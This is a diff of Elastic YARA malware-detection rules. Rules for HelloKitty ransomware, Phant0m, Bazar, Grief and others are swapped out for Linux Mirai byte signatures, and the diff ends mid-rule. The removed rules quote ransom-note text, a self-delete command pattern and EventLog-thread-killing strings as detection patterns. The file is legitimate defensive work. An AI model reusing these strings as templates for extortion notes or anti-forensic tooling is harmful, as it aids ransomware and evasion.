ELASTIC_Linux_Trojan_Mirai_Fe721Dc5 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Phant0M (Windows.Hacktool.Phant0m)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "2d6f9b57-bde0-4570-8e38-187dbf05e6d3" - date = "2024-02-28" - modified = "2024-03-21" + id = "fe721dc5-c2bc-4fa6-bdbc-589c6e033e6b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Phant0m.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "30978aadd7d7bc86e735facb5046942792ad1beab6919754e6765e0ccbcf89d6" - logic_hash = "a66f8779f77b216f7831617a34c008e4202f36e74f2866c9792cee34b804408d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1067-L1084" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e9312eefb5f14a27d96e973139e45098c2f62a24d5254ca24dea64b9888a4448" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d4a92775e76bbb00e677a289942f9b3f8101a1dc2f55b30cfa32e4c7feae6c8a" + fingerprint = "ab7f571a3a3f6b50b9e120612b3cc34d654fc824429a2971054ca0d078ecb983" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $api = "NtQueryInformationThread" - $s1 = "Suspending EventLog thread %d with start address %p" - $s2 = "Found the EventLog Module (wevtsvc.dll) at %p" - $s3 = "Event Log service PID detected as %d." - $s4 = "Thread %d is detected and successfully killed." - $s5 = "Windows EventLog module %S at %p" + $a = { 89 18 EB E1 57 83 EC 08 8B 7C 24 10 8B 4C 24 14 8B 54 24 18 53 } condition: - $api and 2 of ($s*) + all of them } -rule ELASTIC_Windows_Ransomware_Hellokitty_8859E8E8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_575F5Bc8 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "8859e8e8-f94c-4853-b296-1fc801486c57" - date = "2021-05-03" - modified = "2021-08-23" + id = "575f5bc8-b848-4db4-a99c-132d4d2bc8a4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hellokitty.yar#L1-L32" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9" - logic_hash = "72cc718724d9d9a391a9f7a0932ebf397c2ab79558437533bef6e380b06baff9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1086-L1103" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "dec143d096f5774f297ce90ef664ae50c40ae4f87843bbb34e496565c0faf3b2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f9791409d2a058dd68dc09df5e4b597c6c6a1f0da9801d7ab9e678577b621730" + fingerprint = "58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "HelloKittyMutex" wide fullword - $a2 = "%s\\read_me_lkd.txt" wide fullword - $a3 = "Win32_ShadowCopy.ID='%s'" wide fullword - $a4 = "Trying to decrypt or modify the files with programs other than our decryptor can lead to permanent loss of data!" wide fullword - $a5 = "%s/secret/%S" wide fullword - $a6 = "DECRYPT_NOTE.txt" wide fullword - $a7 = "Some data has been stored in our servers and ready for publish." wide fullword - $a9 = "To contact with us you have ONE week from the encryption time, after decryption keys and your personal contact link will be dele" wide - $a10 = "In case of your disregard, we reserve the right to dispose of the dumped data at our discretion including publishing." wide fullword - $a11 = "IMPORTANT: Don't modify encrypted files or you can damage them and decryption will be impossible!" wide fullword - $b1 = "/f /im \"%s\"" wide fullword - $b2 = "stop \"%s\"" wide fullword - $b3 = "/f /im %s" wide fullword - $b4 = "stop %s" wide fullword + $a = { 5A 56 5B 5B 55 42 44 5E 59 52 44 44 00 5E 73 5E 45 52 54 43 00 } condition: - (2 of ($a*) and 2 of ($b*)) or (5 of ($a*)) + all of them } -rule ELASTIC_Windows_Ransomware_Hellokitty_4B668121 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_449937Aa : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "4b668121-cc21-4f0b-b0fc-c2b5b4cb53e8" - date = "2021-05-03" - modified = "2021-08-23" + id = "449937aa-682a-4906-89ab-80d7127e461e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hellokitty.yar#L34-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0" - logic_hash = "00c7a492c304f12b9909e35cf069618a1103311a69e3e8951ca196c3c663b12a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1105-L1123" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6f27766534445cffb097c7c52db1fca53b2210c1b10b75594f77c34dc8b994fe" + logic_hash = "d459e46893115dbdef46bcaceb6a66255ef3a389f1bf7173b0e0bd0d8ce024fb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "834316ce0f3225b1654b3c4bccb673c9ad815e422276f61e929d5440ca51a9fa" + fingerprint = "cf2c6b86830099f039b41aeaafbffedfb8294a1124c499e99a11f48a06cd1dfd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword - $a2 = "(%d) [%d] %s: Looking for folder from cmd: %S" ascii fullword - $a3 = "(%d) [%d] %s: ERROR: Failed to encrypt AES block" ascii fullword - $a4 = "gHelloKittyMutex" wide fullword - $a5 = "/C ping 127.0.0.1 & del %s" wide fullword - $a6 = "Trying to decrypt or modify the files with programs other than our decryptor can lead to permanent loss of data!" - $a7 = "read_me_lkdtt.txt" wide fullword - $a8 = "If you want to get it, you must pay us some money and we will help you." wide fullword + $a = { 00 00 5B 72 65 73 6F 6C 76 5D 20 46 6F 75 6E 64 20 49 50 20 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Ransomware_Hellokitty_D9391A1A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_2E3F67A9 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "d9391a1a-78d3-4ae6-8e45-630ceec8bade" - date = "2021-05-03" - modified = "2023-01-04" + id = "2e3f67a9-6fd5-4457-a626-3a9015bdb401" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hellokitty.yar#L61-L80" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768" - logic_hash = "074ca47c0526d9828f3c07c7d6dbdd1cec609670d70340b022ae2c712ad80305" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1125-L1143" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" + logic_hash = "8c83c5d32c58041444f33264f692a7580c76324d2cbad736fdd737bdfcd63595" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8779a926a237af0a966534931b60acd54f5d6d65063c070a3621ec604e280ff8" + fingerprint = "6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 C4 04 85 DB 75 12 0F 10 45 D4 83 C7 10 0F 11 06 83 C6 10 83 } - $a2 = { 89 45 F8 3B 5D F4 75 25 3B C6 75 21 6A FF FF 75 14 8B D1 83 } + $a = { 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44 } condition: - any of them + all of them } -rule ELASTIC_Linux_Cryptominer_Flystudio_579A3A4D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_01E4A728 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Flystudio (Linux.Cryptominer.Flystudio)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "579a3a4d-ddb0-4f73-9224-16fba973d624" + id = "01e4a728-7c1c-479b-aed0-cb76d64dbb02" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Flystudio.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "84afc47554cf42e76ef8d28f2d29c28f3d35c2876cec2fb1581b0ac7cfe719dd" - logic_hash = "6579630a4fb6cf5bc8ccb2e4f93f5d549baa6ea9b742b2ee83a52f07352c4741" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1145-L1162" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "753936b97a36c774975a1d0988f6f908d4b5e5906498aa34c606d4cd971f1ba5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "148b27046f72a7645ebced9f76424ffd7b368347311b04c9357d5d4ea8d373fb" + fingerprint = "d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103360,27 +103710,28 @@ rule ELASTIC_Linux_Cryptominer_Flystudio_579A3A4D : FILE MEMORY os = "linux" strings: - $a = { EF C1 66 0F 72 F1 05 66 0F EF C2 66 0F EF C1 66 0F 6F CD 66 0F } + $a = { 44 24 23 48 8B 6C 24 28 83 F9 01 4A 8D 14 20 0F B6 02 88 45 08 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Flystudio_0A370634 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_64D5Cde2 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Flystudio (Linux.Cryptominer.Flystudio)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "0a370634-51de-46bf-9397-c41ef08a7b83" + id = "64d5cde2-e4b1-425b-8af3-314a5bf519a9" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Flystudio.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "cf924ba45a7dba19fe571bb9da8c4896690c3ad02f732b759a10174b9f61883f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1164-L1182" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "caf2a8c199156db2f39dbb0a303db56040f615c4410e074ef56be2662752ca9d" + logic_hash = "08f3635e5517185cae936b39f503bbeba5aed2e36abdd805170a259bc5e3644f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6613ddd986e2bf4b306cd1a5c28952da8068f1bb533c53557e2e2add5c2dbd1f" + fingerprint = "1a69f91b096816973ce0c2e775bcf2a54734fa8fbbe6ea1ffcf634ce2be41767" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103388,173 +103739,172 @@ rule ELASTIC_Linux_Cryptominer_Flystudio_0A370634 : FILE MEMORY os = "linux" strings: - $a = { 72 D7 19 66 41 0F EF E9 66 0F EF EF 66 0F 6F FD 66 41 0F FE FD 66 44 0F } + $a = { 0F 35 7E B3 02 00 D0 02 00 00 07 01 00 00 0E 00 00 00 18 03 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Grief_9953339A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_0D73971C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Grief (Windows.Ransomware.Grief)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "9953339a-2c67-4ebd-be51-d1055e341abc" - date = "2021-08-04" - modified = "2021-10-04" + id = "0d73971c-4253-4e7d-b1e1-20b031197f9e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Grief.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0864575d4f487e52a1479c61c2c4ad16742d92e16d0c10f5ed2b40506bbc6ca0" - logic_hash = "f99ea1e1f59dc2999659cbe649e76001dd7139b1438440717b60f081d1e99d70" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1184-L1202" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" + logic_hash = "56f3bac05fce0a0458e5b80197335e7bef6dcd50b9feb6f1008b8679f29cf37a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d7d70c3681c4d4103d9ff52c3bdd174ccbdb49343c34407e90abb5a83a8422f4" + fingerprint = "95279bc45936ca867efb30040354c8ff81de31dccda051cfd40b4fb268c228c5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 65 64 73 63 6F 72 70 69 6F 71 65 6E 61 62 6C 65 54 72 61 6E 73 6C 61 74 65 2E 41 64 65 65 6D 65 64 59 00 5A 41 70 70 6C 69 63 61 74 69 6F 6E 65 69 74 68 65 72 33 34 2E 30 28 39 39 25 6D 65 6D 6F 72 79 2C 77 69 74 68 6F 75 74 00 66 6F 72 47 6F 6F 67 6C 65 6C 74 68 65 6D 6F 72 65 6D 77 61 73 00 39 32 41 6E 69 6E 65 74 68 65 75 48 73 74 61 62 6C 65 73 6F 66 66 69 63 69 61 6C 00 43 4B 76 65 72 73 69 6F 6E 46 71 74 68 65 63 6F 6D 70 61 6E 79 2C 74 6F 6E 2E 35 30 37 00 6E 69 6E 2D 70 61 67 65 44 73 63 61 6E 6E 69 6E 67 61 63 63 65 73 73 48 69 63 6F 6E 72 65 6D } + $a = { 89 C2 83 EB 04 C1 E2 0B 31 C2 89 F0 C1 E8 13 89 D1 31 F0 C1 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bazar_711D59F6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_82C361D4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "711d59f6-6e8a-485d-b362-4c1bf1bda66e" - date = "2021-06-28" - modified = "2021-08-23" + id = "82c361d4-2adf-48f2-a9be-677676d7451f" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bazar.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f29253139dab900b763ef436931213387dc92e860b9d3abb7dcd46040ac28a0e" - logic_hash = "3bde62b468c44bdc18878fd369a7f0cf06f7be64149587a11524f725fa875f69" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1204-L1222" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f8dbcf0fc52f0c717c8680cb5171a8c6c395f14fd40a2af75efc9ba5684a5b49" + logic_hash = "766a964d7d35525fbc88adcf86fb69d11f9c63c0d28ceefb3ae79797a7161193" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a9e78b4e39f4acaba86c2595db67fcdcd40d1af611d41a023bd5d8ca9804efa4" + fingerprint = "a8a4252c6f7006181bdb328d496e0e29522f87e55229147bc6cf4d496f5828fb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 0F 94 C3 41 0F 95 C0 83 FA 0A 0F 9C C1 83 FA 09 0F 9F C2 31 C0 } + $a = { 23 CB 67 4C 94 11 6E 75 EC A6 76 98 23 CC 80 CF AE 3E A6 0C } condition: all of them } -rule ELASTIC_Windows_Trojan_Bazar_9Dddea36 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ec591E81 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "9dddea36-1345-434b-8ce6-54d2eab39616" - date = "2021-06-28" - modified = "2021-08-23" + id = "ec591e81-8594-4317-89b0-0fb4d43e14c1" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bazar.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "63df43daa61f9a0fbea2e5409b8f0063f7af3363b6bc8d6984ce7e90c264727d" - logic_hash = "cf88e2e896fce742ad3325d53523167d6eb42188309ed4e66f73601bbb85574e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1224-L1242" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7d45a4a128c25f317020b5d042ab893e9875b6ff0ef17482b984f5b3fe87e451" + logic_hash = "f2a147fe7f98d2b3141a1fda118ee803c81d9bc6f498bfaf3557665397eb44da" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e322e36006cc017d5d5d9887c89b180c5070dbe5a9efd9fb7ae15cda5b726d6c" + fingerprint = "fe3d305202ca5376be7103d0b40f746fc26f8e442f8337a1e7c6d658b00fc4aa" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { C4 10 5B 5F 5E C3 41 56 56 57 55 53 48 83 EC 18 48 89 C8 48 } + $a = { 22 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C } condition: all of them } -rule ELASTIC_Windows_Trojan_Bazar_3A2Cc53B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_0Eba3F5A : FILE MEMORY { meta: - description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "3a2cc53b-4f73-41f9-aabd-08b8755ba44c" - date = "2021-06-28" - modified = "2021-08-23" + id = "0eba3f5a-1aa8-4dc8-9f63-01bc4959792a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bazar.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b057eb94e711995fd5fd6c57aa38a243575521b11b98734359658a7a9829b417" - logic_hash = "8cde37be646dbcf7e7f5e3f28f0fe8c95480861c62fa2ee8cdd990859313756c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1244-L1262" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2e4f89c76dfefd4b2bfd1cf0467ac0324026355723950d12d7ed51195fd998cf" + logic_hash = "bcb2f1e1659102f39977fac43b119c58d6c72f828c3065e2318f671146e911da" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f146d4fff29011acf595f2cba10ed7c3ce6ba07fbda0864d746f8e6355f91add" + fingerprint = "c0f4f9a93672bce63c9e3cfc389c73922c1c24a2db7728ad7ebc1d69b4db150f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 48 63 41 3C 45 33 ED 44 8B FA 48 8B F9 8B 9C 08 88 00 00 00 44 8B A4 08 8C 00 } + $a = { C3 55 48 89 E5 48 83 EC 40 48 89 7D C8 89 F0 66 89 45 C4 C7 45 DC 01 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bazar_De8D625A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_E43A8744 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "de8d625a-8f85-47b7-bcad-e3cc012e4654" - date = "2022-01-14" - modified = "2022-04-12" + id = "e43a8744-1c52-4f95-bd16-be6722bc4d1a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bazar.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ad9ac4785b82c8bfa355c7343b9afc7b1f163471c41671ea2f9152a1b550f0c" - logic_hash = "5fd7bb4ac818ec1b4bfcb7d236868a31b2f726182407c07c7f06c1d7e9c15d02" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1264-L1282" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f363d9bd2132d969cd41e79f29c53ef403da64ca8afc4643084cc50076ddfb47" + logic_hash = "17c52d2b720fa2e98c3e9bb077525a695a6e547a66e8c44fcc1e26e48df81adf" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "17b2de5803589634fd7fb4643730fbebfa037c4d0b66be838a1c78af22da0228" + fingerprint = "e7ead3d1a51f0d7435a6964293a45cb8fadd739afb23dc48c1d81fbc593b23ef" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 49 8B F0 48 8B FA 48 8B D9 48 85 D2 74 61 4D 85 C0 74 5C 48 39 11 75 06 4C 39 41 08 74 2B 48 8B 49 } + $a = { 23 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C } condition: all of them } -rule ELASTIC_Linux_Hacktool_Cleanlog_C2907D77 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_6E8E9257 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "c2907d77-6ea9-493f-a7b3-4a0795da0a1d" + id = "6e8e9257-a6d5-407a-a584-4656816a3ddc" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Cleanlog.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "613ac236130ab1654f051d6f0661fa62414f3bef036ea4cc585b4b21a4bb9d2b" - logic_hash = "39b72973bbcddf14604b8ea08339657cba317c23fd4d69d4aa0903b262397988" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1284-L1301" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "67973257e578783838f18dc8ae994f221ad1c1b3f4a04a2b6b523da5ebd8c95b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "131c71086c30ab22ca16b3020470561fa3d32c7ece9a8faa399a733e8894da30" + fingerprint = "4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103562,28 +103912,28 @@ rule ELASTIC_Linux_Hacktool_Cleanlog_C2907D77 : FILE MEMORY os = "linux" strings: - $a = { 89 E5 48 83 EC 10 89 7D FC 83 7D FC 00 7E 11 8B 45 FC BE 09 00 } + $a = { 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Cleanlog_3Eb725D1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ac253E4F : FILE MEMORY { meta: - description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "3eb725d1-24de-427a-b6ed-3ca03c0716df" + id = "ac253e4f-b628-4dd0-91f1-f19099286992" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Cleanlog.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4df4ebcc61ab2cdb8e5112eeb4e2f29e4e841048de43d7426b1ec11afe175bf6" - logic_hash = "a9530aca53d935f3e77a5f0fc332db16e3a2832be67c067e5a6d18e7ec00e39f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1303-L1321" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" + logic_hash = 